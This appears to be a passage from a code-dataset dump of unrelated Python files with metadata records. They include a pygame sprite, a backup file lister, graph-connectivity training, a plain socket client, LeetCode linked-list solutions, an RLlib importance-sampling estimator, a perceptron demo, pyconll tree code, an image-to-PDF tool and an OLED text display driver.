self.imagenes[self.imagen_actual][0]\n\n\t\tself.rect = self.imagen.get_rect()\n\t\tself.rect.x = 0\n\t\tself.rect.y = 400\n\t\tself.velocidad = random.randrange(1, 3)\n\n\t\tself.movimiento = False\n\t\tself.orientacion = 0\n\n\t\tself.t = 0\n\n\t\tself.u = 0\n\n\t# Actualiza la posición\n\tdef actualizar_pos(self, pantalla):\n\n\t\tif self.rect.x < (pantalla.get_width() - self.imagen.get_width()) and self.t == 0:\n\t\t\tself.rect.x += self.velocidad\n\t\tif self.rect.x >= pantalla.get_width() - self.imagen.get_width():\n\t\t\tself.t = 1\n\t\t\tself.orientacion = 1\n\n\t\tif self.rect.x > 0 and self.t == 1:\n\t\t\tself.rect.x -= self.velocidad\n\t\tif self.rect.x <= 0:\n\t\t\tself.t = 0\n\t\t\tself.orientacion = 0\n\n\t\tself.siguiente_imagen()\n\n\n\n\t# Imprime en pantalla la imagen\n\tdef dibujar(self, pantalla):\n\t\tself.imagen = self.imagenes[self.orientacion][self.imagen_actual]\n\t\tpantalla.blit(self.imagen, self.rect)\n\n\tdef siguiente_imagen(self):\n\t\tself.u += 1\n\n\t\tif self.u == 6:\n\t\t\tself.imagen_actual += 1\n\t\t\tself.u = 0\n\n\t\tif self.imagen_actual > (len(self.imagenes)):\n\t\t\tself.imagen_actual = 0\n\n\tdef colision(self, jugador, pantalla, gato, lista_obstaculos):\n\t\tif self.rect.colliderect(jugador):\n\t\t\tjugador.perder(pantalla, gato, lista_obstaculos)\n","sub_path":"Código/tazas.py","file_name":"tazas.py","file_ext":"py","file_size_in_byte":5804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"267907182","text":"import os\nimport logging\nfrom typing import Set, Optional\nfrom datetime import datetime\nfrom modules.classes import ItemMetaData, FileMetaData, DirectoryMetaData\nfrom config.dataobjects import DirectoryConfiguration\n\n\nclass ItemMetaDataLoader(object):\n def __init__(self, directory_configuration: DirectoryConfiguration):\n self.directory_configuration = directory_configuration # type: DirectoryConfiguration\n\n def load(self, parent: Optional[DirectoryMetaData]) -> Set[ItemMetaData]:\n \"\"\"\n loads the list of files of a single directory to backup, defined by the DirectoryConfiguration\n \"\"\"\n local_dir_content = os.listdir(self.directory_configuration.directory)\n logging.debug(\"loaded directory content of {}\".format(self.directory_configuration.directory))\n filematches = set()\n dirmatches = set()\n for content_entry in local_dir_content:\n fqn_content = os.path.join(self.directory_configuration.directory, content_entry)\n if os.path.isfile(fqn_content):\n if any(file_entry.matches(content_entry)\n for file_entry in self.directory_configuration.get_excluded_files()):\n logging.debug(\"{} is excluded file.\".format(content_entry))\n continue\n if any(file_entry.matches(content_entry)\n for file_entry in self.directory_configuration.get_included_files()):\n logging.debug(\"{} is included file.\".format(content_entry))\n filematches.add(content_entry)\n if os.path.isdir(fqn_content):\n if any(dir_entry.matches(content_entry)\n for dir_entry in self.directory_configuration.get_excluded_directories()):\n logging.debug(\"{} is excluded directory.\".format(content_entry))\n continue\n if any(dir_entry.matches(content_entry)\n for dir_entry in self.directory_configuration.get_included_directories()):\n logging.debug(\"{} is included directory.\".format(content_entry))\n dirmatches.add(content_entry)\n\n itemmetadata = set()\n for file in filematches:\n logging.debug(\"Creating FileMetaData for {}\".format(file))\n itemmetadata.add(FileMetaData(file,\n datetime.fromtimestamp(os.path.getmtime(\n os.path.join(self.directory_configuration.directory, file)))\n .replace(microsecond=0),\n os.path.getsize(os.path.join(self.directory_configuration.directory, file)),\n parent))\n for directory in dirmatches:\n logging.debug(\"Creating DirectoryMetaData for {}\".format(directory))\n itemmetadata.add(DirectoryMetaData(directory,\n datetime.fromtimestamp(os.path.getmtime(\n os.path.join(self.directory_configuration.directory, directory)))\n .replace(microsecond=0),\n parent))\n\n return itemmetadata\n","sub_path":"localfilehandling/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":3336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"334823246","text":"import torch\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\n\nimport random\n\nfrom graph_tool import generation, spectral\nfrom graph_tool.topology import shortest_distance\n\nimport tools\nimport loaders\nimport network\n\nfrom termcolor import cprint\n\ndef random_degree():\n\treturn 2\n\ndef random_two_nodes(N):\n\treturn random.sample(range(N), 2)\n\ndef are_connected(G, a, b):\n\tM = spectral.adjacency(G)\n\treturn M[a, b]\n\ndef make_problem():\n\tN = 20\n\tG = generation.random_graph(N, random_degree, directed=False)\n\n\tadjM = spectral.adjacency(G).todense()\n\tadjM = torch.tensor(adjM).float()\n\n\ta, b = random_two_nodes(N)\n\tchosen = torch.zeros(N)\n\tchosen[a] = 1\n\tchosen[b] = 1\n\n\tx = torch.cat((adjM, chosen.view(N, 1)), dim=-1)\n\ty = are_connected(G, a, b)\n\n\treturn x, y\n\ndef main():\n\thas_cuda = torch.cuda.is_available()\n\tdev = torch.device('cuda' if has_cuda else 'cpu')\n\n\tsvd_net = network.SVDNet()\n\tsvd_opt = optim.Adam(svd_net.parameters())\n\tprint(f'SVDNet # of params: {tools.nparams(svd_net)}')\n\n\tconv_net = network.ConvNet()\n\tconv_opt = optim.Adam(conv_net.parameters())\n\tprint(f'ConvNet # of params: {tools.nparams(conv_net)}')\n\n\tlin_net = network.LinearNet()\n\tlin_opt = optim.Adam(lin_net.parameters())\n\tprint(f'LinearNet # of params: {tools.nparams(lin_net)}')\n\n\ttrain_ds = loaders.Problems(5000, make_problem)\n\ttest_ds = loaders.Problems(1000, make_problem)\n\n\ttrain_loader = DataLoader(train_ds, batch_size=5, shuffle=True)\n\ttest_loader = DataLoader(test_ds, batch_size=5)\n\n\tnepoch = 5\n\tfor epoch in range(nepoch):\n\t\tprint()\n\t\tprint(f'--- epoch {epoch}')\n\n\t\tcprint('SVDNet', 'red')\n\t\ttools.train(svd_net, dev, train_loader, svd_opt)\n\t\ttools.test(svd_net, dev, test_loader)\n\t\tprint()\n\n\t\tcprint('ConvNet', 'blue')\n\t\ttools.train(conv_net, dev, train_loader, conv_opt)\n\t\ttools.test(conv_net, dev, test_loader)\n\t\tprint()\n\n\t\tcprint('LinearNet', 'green')\n\t\ttools.train(lin_net, dev, train_loader, lin_opt)\n\t\ttools.test(lin_net, dev, test_loader)\n\t\tprint()\n\nif __name__ == '__main__':\n\ttorch.set_default_dtype(torch.float32)\n\ttorch.set_default_tensor_type(torch.FloatTensor)\n\n\tmain()\n","sub_path":"connected.py","file_name":"connected.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"310936904","text":"import socket\n\n\nclass Connector:\n '''\n simple netcat implementation\n python2 and python3 supported\n '''\n\n def __init__(self, ip, port):\n self.__ip = ip\n self.__port = int(port)\n\n def set_ip(self, ip):\n self.__ip = ip\n\n def set_port(self, port):\n self.__port = int(port)\n\n def send_data(self, sent_data, timeout=60):\n try:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.settimeout(timeout)\n sock.connect((self.__ip, self.__port))\n sock.sendall(sent_data.encode('UTF-8'))\n sock.shutdown(socket.SHUT_WR)\n output = ''\n listen = True\n while listen:\n received_data = sock.recv(1024)\n output += received_data.decode('UTF-8')\n if not received_data:\n listen = False\n sock.close()\n return output.strip()\n except socket.timeout as err:\n raise Exception(err)\n except socket.error as err:\n raise Exception(err)\n","sub_path":"connector.py","file_name":"connector.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"238819035","text":"class Solution:\n def replaceWords(self, dict, sentence):\n \"\"\"\n :type dict: List[str]\n :type sentence: str\n :rtype: str\n \"\"\"\n sorted_dict = sorted(dict, key=len)\n sentence = sentence.split()\n for i in range(len(sentence)):\n for w in sorted_dict:\n if sentence[i].startswith(w):\n sentence[i] =w\n break\n return ' '.join(sentence)\n\n\nif __name__ == \"__main__\":\n solution = Solution()\n testdata1 = [\"cat\", \"bat\", \"rat\"]\n testdata2 = \"the cattle was rattled by the battery\"\n result = solution.replaceWords(testdata1, testdata2)\n print(result)","sub_path":"600-700/648_replace_words.py","file_name":"648_replace_words.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"215798064","text":"from ray.rllib.offline.estimators.off_policy_estimator import OffPolicyEstimator\nfrom ray.rllib.utils.annotations import override, DeveloperAPI\nfrom ray.rllib.utils.typing import SampleBatchType\nfrom ray.rllib.utils.numpy import convert_to_numpy\nfrom ray.rllib.utils.policy import compute_log_likelihoods_from_input_dict\nfrom typing import Dict, Any\nimport numpy as np\n\n\n@DeveloperAPI\nclass ImportanceSampling(OffPolicyEstimator):\n \"\"\"The step-wise IS estimator.\n\n Let s_t, a_t, and r_t be the state, action, and reward at timestep t.\n\n For behavior policy \\pi_b and evaluation policy \\pi_e, define the\n cumulative importance ratio at timestep t as:\n p_t = \\sum_{t'=0}^t (\\pi_e(a_{t'} | s_{t'}) / \\pi_b(a_{t'} | s_{t'})).\n\n This estimator computes the expected return for \\pi_e for an episode as:\n V^{\\pi_e}(s_0) = \\sum_t \\gamma ^ {t} * p_t * r_t\n and returns the mean and standard deviation over episodes.\n\n For more information refer to https://arxiv.org/pdf/1911.06854.pdf\"\"\"\n\n @override(OffPolicyEstimator)\n def estimate(self, batch: SampleBatchType) -> Dict[str, Any]:\n \"\"\"Compute off-policy estimates.\n\n Args:\n batch: The SampleBatch to run off-policy estimation on\n\n Returns:\n A dict consists of the following metrics:\n - v_behavior: The discounted return averaged over episodes in the batch\n - v_behavior_std: The standard deviation corresponding to v_behavior\n - v_target: The estimated discounted return for `self.policy`,\n averaged over episodes in the batch\n - v_target_std: The standard deviation corresponding to v_target\n - v_gain: v_target / max(v_behavior, 1e-8), averaged over episodes\n - v_gain_std: The standard deviation corresponding to v_gain\n \"\"\"\n batch = self.convert_ma_batch_to_sample_batch(batch)\n self.check_action_prob_in_batch(batch)\n estimates = {\"v_behavior\": [], \"v_target\": [], \"v_gain\": []}\n for episode in batch.split_by_episode():\n rewards, old_prob = episode[\"rewards\"], episode[\"action_prob\"]\n log_likelihoods = compute_log_likelihoods_from_input_dict(\n self.policy, episode\n )\n new_prob = np.exp(convert_to_numpy(log_likelihoods))\n\n # calculate importance ratios\n p = []\n for t in range(episode.count):\n if t == 0:\n pt_prev = 1.0\n else:\n pt_prev = p[t - 1]\n p.append(pt_prev * new_prob[t] / old_prob[t])\n\n # calculate stepwise IS estimate\n v_behavior = 0.0\n v_target = 0.0\n for t in range(episode.count):\n v_behavior += rewards[t] * self.gamma ** t\n v_target += p[t] * rewards[t] * self.gamma ** t\n\n estimates[\"v_behavior\"].append(v_behavior)\n estimates[\"v_target\"].append(v_target)\n estimates[\"v_gain\"].append(v_target / max(v_behavior, 1e-8))\n estimates[\"v_behavior_std\"] = np.std(estimates[\"v_behavior\"])\n estimates[\"v_behavior\"] = np.mean(estimates[\"v_behavior\"])\n estimates[\"v_target_std\"] = np.std(estimates[\"v_target\"])\n estimates[\"v_target\"] = np.mean(estimates[\"v_target\"])\n estimates[\"v_gain_std\"] = np.std(estimates[\"v_gain\"])\n estimates[\"v_gain\"] = np.mean(estimates[\"v_gain\"])\n return estimates\n","sub_path":"rllib/offline/estimators/importance_sampling.py","file_name":"importance_sampling.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"554004122","text":"#!/usr/bin/env python\n# -*- coding: utf8 -*-\n\"\"\"Page 30-32, Perceptron algorithm,\n\nwith an OR logic demo, predict it's outputs and calculate it's Confusion matrix\n\"\"\"\n# Code from Chapter 2 of Machine Learning: An Algorithmic Perspective\n# by Stephen Marsland\n# (http://seat.massey.ac.nz/personal/s.r.marsland/MLBook.html)\n\n# You are free to use, change, or redistribute the code in any way you wish for\n# non-commercial purposes, but please maintain the name of the original author.\n# This code comes with no warranty of any kind.\n\n# Stephen Marsland, 2008\nimport numpy as np\n\nclass pcn(object):\n \"\"\" A basic Perceptron (the same pcn.py except with the weights printed\n and it does not reorder the inputs)\"\"\"\n\n def __init__(self,inputs,targets):\n \"\"\" Constructor \"\"\"\n # Set up network size\n #if ndim(inputs)>1:\n #self.nIn = shape(inputs)[1]\n #else:\n #self.nIn = 1\n\n #if ndim(targets)>1:\n #self.nOut = shape(targets)[1]\n #else:\n #self.nOut = 1\n self.nIn = inputs.shape[1] if inputs.ndim > 1 else 1\n self.nOut = targets.shape[1] if targets.ndim > 1 else 1\n\n self.nData = inputs.shape[0]\n\n # Initialise network\n self.weights = np.random.rand(self.nIn+1,self.nOut) * 0.1 - 0.05\n # self.weights = np.zeros((self.nIn+1,self.nOut))\n\n def pcntrain(self,inputs,targets,eta,nIterations):\n \"\"\" Train the thing \"\"\"\n # Add the inputs that match the bias node\n inputs = np.concatenate((inputs,-np.ones((self.nData,1))),axis=1)\n\n # Training\n for n in range(nIterations):\n\n self.outputs = self.pcnfwd(inputs);\n self.weights += eta*np.dot(inputs.transpose(), targets-self.outputs)\n print( \"Iteration: \", n)\n print( self.weights)\n\n activations = self.pcnfwd(inputs)\n print(\"Final outputs are:\")\n print( activations )\n #return self.weights\n\n def pcnfwd(self,inputs):\n \"\"\" Run the network forward \"\"\"\n\n outputs = np.dot(inputs,self.weights)\n\n # Threshold the outputs\n return np.where(outputs>0,1,0)\n\n\n def confmat(self,inputs,targets):\n \"\"\"Confusion matrix\"\"\"\n\n # Add the inputs that match the bias node\n inputs_bias = np.concatenate((inputs,-np.ones((self.nData,1))),axis=1)\n outputs = np.dot(inputs_bias, self.weights)\n\n nClasses = targets.shape[1]\n\n if nClasses==1:\n nClasses = 2\n outputs = np.where(outputs>0,1,0)\n else:\n # 1-of-N encoding\n outputs = np.argmax(outputs,1)\n targets = np.argmax(targets,1)\n\n cm = np.zeros((nClasses,nClasses))\n for i in range(nClasses):\n for j in range(nClasses):\n cm[i,j] = np.sum(np.where(outputs==i,1,0) *\n np.where(targets==j,1,0))\n\n print(cm)\n print(np.trace(cm)/np.sum(cm))\ndef xor_logic(is3d=False):\n \"\"\" Run XOR logic functions \"\"\"\n if is3d:\n inputs = np.array([[0,0,1],[0,1,0],[1,0,0],[1,1,0]])\n else:\n inputs = np.array([[0,0],[0,1],[1,0],[1,1]])\n targets = np.array([[0],[1],[1],[0]])\n p = pcn(inputs, targets)\n p.pcntrain(inputs, targets, .25, 15)\n # predict it's outputs\n inputs_bias = np.concatenate((inputs, -np.ones((inputs.shape[0],1))),\n axis=1)\n print(p.pcnfwd(inputs_bias))\n # calculate it's Confusion matrix\n p.confmat(inputs, targets)\n \ndef main():\n \"\"\" Run OR logic functions \"\"\"\n inputs = np.array([[0,0],[0,1],[1,0],[1,1]])\n targets = np.array([[0],[1],[1],[1]])\n p = pcn(inputs, targets)\n p.pcntrain(inputs, targets, .25, 6)\n # predict it's outputs\n inputs_bias = np.concatenate((inputs, -np.ones((inputs.shape[0],1))),\n axis=1)\n print(p.pcnfwd(inputs_bias))\n # calculate it's Confusion matrix\n p.confmat(inputs, targets)\n\n # Run XOR logic functions\n xor_logic()\n\n # Run XOR logic functions, 3D version\n xor_logic(is3d=True)\nif __name__ == \"__main__\":\n main() ","sub_path":"Machine Learning An Algorithmic Perspective/ch3Neurons Neural Networks and Linear Discriminants/pcn_logic_eg.py","file_name":"pcn_logic_eg.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"110638699","text":"\"\"\"\nMerge k sorted linked lists and return it as one sorted list. Analyze and describe its complexity.\n\nExample:\n\nInput:\n[\n 1->4->5,\n 1->3->4,\n 2->6\n]\nOutput: 1->1->2->3->4->4->5->6\n\"\"\"\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n# Brute force. Nlog(N). N space. N = total number of nodes\nclass Solution(object):\n def mergeKLists(self, lists):\n \"\"\"\n :type lists: List[ListNode]\n :rtype: ListNode\n \"\"\"\n nums = []\n for l in lists:\n while l:\n nums.append(l.val)\n l = l.next\n \n head = runner = ListNode(0)\n for num in sorted(nums):\n runner.next = ListNode(num)\n runner = runner.next\n\n return head.next\n\n\n\n# Merge in one list at a time. O(N)K time where N is total nodes\n# and k is number of lists.\n# 5332ms. 7th percentile.\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n if len(lists) == 0:\n return None\n elif len(lists) == 1:\n return lists[0]\n \n head = self._mergeTwoLists(lists[0], lists[1])\n for listHead in lists[2:]:\n head = self._mergeTwoLists(head, listHead)\n \n return head\n \n \n def _mergeTwoLists(self, first, second):\n head = merger = ListNode(-1)\n \n while first or second:\n if first and not second:\n merger.next = first\n break\n elif second and not first:\n merger.next = second\n break\n elif first.val <= second.val:\n merger.next = first\n first = first.next\n elif second.val < first.val:\n merger.next = second\n second = second.next\n \n merger = merger.next\n \n return head.next\n\n\n# Improve the merge in one list at a time approach with divide\n# and conquer. Gives O(Nlog(K)) time and constant space\n# 128ms. 53rd percentile.\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n if len(lists) == 0:\n return None\n \n # Method 1:\n \"\"\" \n Cool idea...we're merging 0-1, 2-3, 4-5, 6-7,....\n Then 0-2, 4-6\n Then 0-4\n So rather than make new lists, we keep merging the second lists into the \n firsts. At the end lists[0] has the final result.\n \"\"\"\n interval = 1\n while interval < len(lists):\n for i in range(0, len(lists) - interval, interval*2):\n lists[i] = self._mergeTwoLists(lists[i], lists[i + interval])\n interval *= 2\n\n\n \"\"\"\n A cleaner way to do the above. It overwrites the lists though. \n \"\"\"\n # while 1 < len(lists):\n # lists = [ self._mergeTwoLists(*lists[i:i+2]) for i in range(0, len(lists), 2) ]\n \n return lists[0]\n \n \n def _mergeTwoLists(self, first, second=None):\n head = merger = ListNode(-1)\n \n while first or second:\n if first and not second:\n merger.next = first\n break\n elif second and not first:\n merger.next = second\n break\n elif first.val <= second.val:\n merger.next = first\n first = first.next\n elif second.val < first.val:\n merger.next = second\n second = second.next\n \n merger = merger.next\n \n return head.next\n\n\n\"\"\"\nNotes:\n\nThere are a lot of ways to do this problem.\n\n1) Easiest is brute force. Just combine all the values into a single list\nsort it and then produce a list using that list of numbers. \n\n2) March through the lists. At each step, compare the nodes at the front of \nthe k lists. Take the smallest one. This requires NK work where K is the number of lists\nand N is the total number of nodes. \n\nIt takes N space if you make a new list. O(1) space if you just interleave the nodes\n\n\n3) Same as two except for the comparisons use a prioirty queue. The comparison cost\ndrops to log(K), so Nlog(K) total. \nNew linked list -> N space\nCombine the lists -> K space (priority queue will have K elements in it at any one time)\n\n\n4) This is the best approach in that its Nlog(k) but constant space. It's a bit trickier though.\nThe idea is cool though. In my opinion it's another example of merge sort esque techniques\nwork surprisingly well with linked lists. \n\nAt the core, we maintain a final list and merge in one list at a time. Then we do this with\na divide and conquer approach. Details:\n\nFirst, note that merging two sorted linked lists is straightforwards. It's easy to imagine\njust merging in a list at a time. We do this k times and process O(N) nodes in total. Total\ntime complexity is O(KN). Space complexity is O(1) if we merge the lists rather than\nmake a new one.\n\nNow bring in the divide and conquer bit. Idea is to pair up the lists, merge the pairs, then\nmerge the resulting lists and so on.\n\nThis is Nlog(k) time complexity. To see why, imagine\n\n4 lists, each with 16 elements. \n\nWe merge them into two lists of 16 elements.\n\nThen merge those into one list of 32 elements. \n\nThe number of merge operations is equal to Log2(K). Each of these merges takes at\nmost O(N) time. So log2(K)*N space.\n\n^Cool aside about this method is the indexing used in repeatedly merging in the lists\n\"\"\"","sub_path":"companies-leetcode/amazon/linked-lists/merge-k-sorted-lists.py","file_name":"merge-k-sorted-lists.py","file_ext":"py","file_size_in_byte":5825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"118151948","text":"\"\"\"\n6. Create a list with the names of friends and colleagues. Search for the\nname ‘John’ using a for a loop. Print ‘not found’ if you didn't find it.\n\"\"\"\n\nnames = [\"Reebika\", \"Tanusha\", \"Jaya\", \"Gita\", \"John\"]\n\nfor name in names:\n if name == 'John':\n print(\"John Found!\")\n break\nelse:\n print(\"Name not Found\")\n","sub_path":"Examples/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"513678342","text":"\"\"\"\nCreate the SentenceTree type as a wrapper around a sentence that constructs a\ntree as well to traverse the sentence in a new way.\n\"\"\"\n\nfrom pyconll.conllable import Conllable\n\nfrom . import Tree\n\n\nclass SentenceTree(Conllable):\n \"\"\"\n A Tree wrapper around a sentence. This type will take in an existing serial\n sentence, and create a tree representation from it. This type holds both the\n sentence and the tree representation of the sentence. Note that an empty\n sentence input will have no data and no children.\n \"\"\"\n\n @staticmethod\n def _create_tree(sentence, root, children_tokens):\n \"\"\"\n Method to create a tree from a sentence given the root token.\n\n Args:\n sentence: The sentence to construct the tree from.\n root: The root token to start the tree at.\n children_tokens: A dictionary from token id to children tokens.\n\n Returns:\n A Tree constructed given the sentence structure.\n \"\"\"\n try:\n tokens = children_tokens[root.id]\n trees = list(\n map(\n lambda token: SentenceTree._create_tree(sentence, token, children_tokens),\n tokens))\n except KeyError:\n trees = None\n\n return Tree(sentence[root.id], trees)\n\n def __init__(self, sentence):\n \"\"\"\n Creates a new SentenceTree given the sentence.\n\n Args:\n sentence: The sentence to wrap and construct a tree from.\n \"\"\"\n self._sentence = sentence\n children_tokens = {}\n\n root_token = None\n for token in self.sentence:\n parent_key = token.head\n\n try:\n children_tokens[parent_key].append(token)\n except KeyError:\n children_tokens[parent_key] = [token]\n\n if token.head == '0':\n root_token = token\n\n root = SentenceTree._create_tree(self.sentence, root_token, children_tokens) \\\n if root_token else Tree(root_token, None)\n\n self._tree = root\n\n @property\n def sentence(self):\n \"\"\"\n Provides the unwrapped sentence. This property is readonly.\n\n Returns:\n The unwrapped sentence.\n \"\"\"\n return self._sentence\n\n @property\n def tree(self):\n \"\"\"\n Provides the constructed tree. This property is readonly.\n\n Returns:\n The constructed tree.\n \"\"\"\n return self._tree\n\n def conll(self):\n \"\"\"\n Outputs the provided tree into CoNLL format.\n\n Returns:\n The CoNLL formatted string.\n \"\"\"\n return self.sentence.conll()\n","sub_path":"pyconll/tree/sentencetree.py","file_name":"sentencetree.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"465074817","text":"import img2pdf\nimport os\nfrom PIL import Image\nfrom helperFunction.transform import four_point_transform\nfrom skimage.filters import threshold_local\nimport numpy as np\nimport argparse\nimport cv2\nimport imutils\nfrom PyPDF2 import PdfFileMerger, PdfFileReader\n\n\n\ndef pdfMerger(files, folderName):\n mergedObject = PdfFileMerger()\n for pdf in os.listdir(folderName):\n mergedObject.append(PdfFileReader(open(folderName+\"/\"+pdf, 'rb')))\n mergedObject.write(folderName+\".pdf\")\n\ndef i2pconverter(files, folderName):\n\n for image in os.listdir(folderName):\n remove_transparency(folderName+\"/\"+image)\n\n try:\n print(\"i2pcon \",folderName)\n os.remove(folderName)\n except Exception as e:\n pass\n pdfname = folderName + \".pdf\"\n with open(pdfname,'wb') as f:\n f.write(img2pdf.convert([folderName+\"/\"+i for i in os.listdir(folderName)]))\n\n\ndef i2pconverterAutoCrop(files, folderName):\n\n for image in os.listdir(folderName):\n remove_transparency(folderName+\"/\"+image)\n \n for image in os.listdir(folderName):\n autoCropHelper(folderName+\"/\"+image)\n\n try:\n print(\"i2pcon \",folderName)\n os.remove(folderName)\n except Exception as e:\n pass\n pdfname = folderName + \".pdf\"\n with open(pdfname,'wb') as f:\n f.write(img2pdf.convert([folderName+\"/\"+i for i in os.listdir(folderName)]))\n \n\n\ndef remove_transparency(image, bg_colour=(255, 255, 255)):\n im = Image.open(image)\n \n # Only process if image has transparency (http://stackoverflow.com/a/1963146)\n if im.mode in ('RGBA', 'LA') or (im.mode == 'P' and 'transparency' in im.info):\n newimg = im.convert('RGB')\n newimg.save(image, 'PNG', quality=80)\n\n else:\n pass\n\n\ndef autoCropHelper(img):\n image = cv2.imread(img)\n ratio = image.shape[0] / 500.0\n orig = image.copy()\n image = imutils.resize(image, height = 500)\n\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (5, 5), 0)\n edged = cv2.Canny(gray, 75, 200)\n\n cnts = cv2.findContours(edged.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n cnts = imutils.grab_contours(cnts)\n cnts = sorted(cnts, key = cv2.contourArea, reverse = True)[:5]\n\n for c in cnts:\n peri = cv2.arcLength(c, True)\n approx = cv2.approxPolyDP(c, 0.02 * peri, True)\n\n if len(approx) == 4:\n screenCnt = approx\n break\n \n try:\n warped = four_point_transform(orig, screenCnt.reshape(4, 2) * ratio)\n\n warped = cv2.cvtColor(warped, cv2.COLOR_BGR2GRAY)\n T = threshold_local(warped, 11, offset = 10, method = \"gaussian\")\n warped = (warped > T).astype(\"uint8\") * 255\n\n cv2.imwrite(img, imutils.resize(warped, height = 650))\n except Exception as e:\n print(\"Error: \", e)\n cv2.imwrite(img, orig)\n","sub_path":"i2p.py","file_name":"i2p.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"570452706","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sys\nimport Adafruit_SSD1306\nfrom PIL import Image, ImageDraw, ImageFont\n#import textwrap\nimport mojimoji\nimport unicodedata\nimport time\n\nfrom ipaddr import ipaddr\n\n# $ wget http://www.geocities.jp/littlimi/arc/misaki/misaki_ttf_2015-04-10.zip\nFONT_PATH = '/home/pi/font/misakifont/misaki_gothic.ttf'\n\nclass MisakiFont:\n def __init__(self, zenkaku=False, fontsize=8, rst=24):\n self.zenkaku_flag = zenkaku\n self.fontsize = fontsize\n self.rst = rst\n\n self.str = []\n self.char_width = self.fontsize\n self.char_height = self.fontsize\n self.cur_row = 0\n self.enable = True\n\n # initialize display\n self.disp = Adafruit_SSD1306.SSD1306_128_64(rst=self.rst)\n #self.disp = Adafruit_SSD1306.SSD1306_96_16(rst=self.rst)\n try:\n self.disp.begin()\n except:\n self.enable = False\n return\n self.disp.clear()\n self.disp.display()\n\n # load font\n self.font = ImageFont.truetype(FONT_PATH, self.fontsize, encoding='unic')\n (self.char_width, self.char_height) = self.font.getsize('8')\n self.char_height += 1\n \n # cols and rows\n self.cols = int(self.disp.width / self.char_width)\n self.rows = int(self.disp.height / self.char_height)\n for i in range(self.rows):\n self.str.append(\"\")\n\n # Create blank image for drawing.\n # Make sure to create image with mode '1' for 1-bit color.\n self.image = Image.new('1', (self.disp.width, self.disp.height))\n\n # Get drawing object to draw on image.\n self.draw = ImageDraw.Draw(self.image)\n \n # Draw a black filled box to clear the image.\n self.draw.rectangle((0,0,self.disp.width,self.disp.height), outline=0, fill=0)\n\n\n def clear(self):\n if not self.enable:\n return\n self.draw.rectangle((0,0,self.disp.width,self.disp.height), outline=0, fill=0)\n self.disp.image(self.image)\n self.disp.display()\n self.cur_row = 0\n for i in range(self.rows):\n self.str[i] = ''\n\n def set_zenkaku_flag(self, value):\n if value:\n self.zenkaku_flag = True\n else:\n self.zenkaku_flag = False\n \n def _draw1line(self, col, row, str):\n if not self.enable:\n return\n x = col * self.char_width\n y = row * self.char_height\n self.draw.text((x,y), str, font=self.font, fill=255)\n\n def println1(self, str):\n if not self.enable:\n return\n self.str[self.cur_row] = str\n self.draw.rectangle((0,0,self.disp.width,self.disp.height), outline=0, fill=0)\n for r in range(self.rows):\n self._draw1line(0, r, self.str[r])\n self.disp.image(self.image)\n self.disp.display()\n self.cur_row += 1\n if self.cur_row > self.rows - 1:\n self.cur_row = self.rows - 1\n self.str.pop(0)\n self.str.append('')\n\n def println(self, s):\n if not self.enable:\n return\n if len(s) == 0:\n self.println1('')\n return\n if self.zenkaku_flag:\n s = mojimoji.han_to_zen(s)\n line = ''\n prev_len = 0\n cur_len = 0\n for ch in s:\n# print(ch)\n prev_len = cur_len\n if unicodedata.east_asian_width(ch) in 'FWA':\n cur_len += 1\n else:\n cur_len += 0.5\n# print(cur_len)\n# print(line)\n if cur_len <= self.cols:\n line += ch\n else:\n #print(prev_len, end='')\n #print(' ' + line)\n self.println1(line)\n line = ch\n cur_len -= prev_len\n if cur_len > 0:\n #print(cur_len, end='')\n #print(' ' + line)\n self.println1(line)\n \n\nif __name__ == '__main__':\n misakifont = MisakiFont()\n print('font ' + str(misakifont.fontsize))\n print('char ' + str(misakifont.char_width) + 'x' + str(misakifont.char_height))\n print('disp ' + str(misakifont.cols) + 'x' + str(misakifont.rows))\n\n misakifont.println('ABCあいうえお0123456789ガギグゲゴガギグゲゴABCあいうえお0123456789ガギグゲゴガギグゲゴ')\n misakifont.println('font:' +\n str(misakifont.fontsize) + ', ' +\n str(misakifont.char_width) + ' x ' +\n str(misakifont.char_height) + ' pixels')\n misakifont.println(str(misakifont.cols) + ' cols ' +\n str(misakifont.rows) + ' rows')\n misakifont.set_zenkaku_flag(True)\n misakifont.println(time.strftime('%Y/%m/%d(%a)'))\n 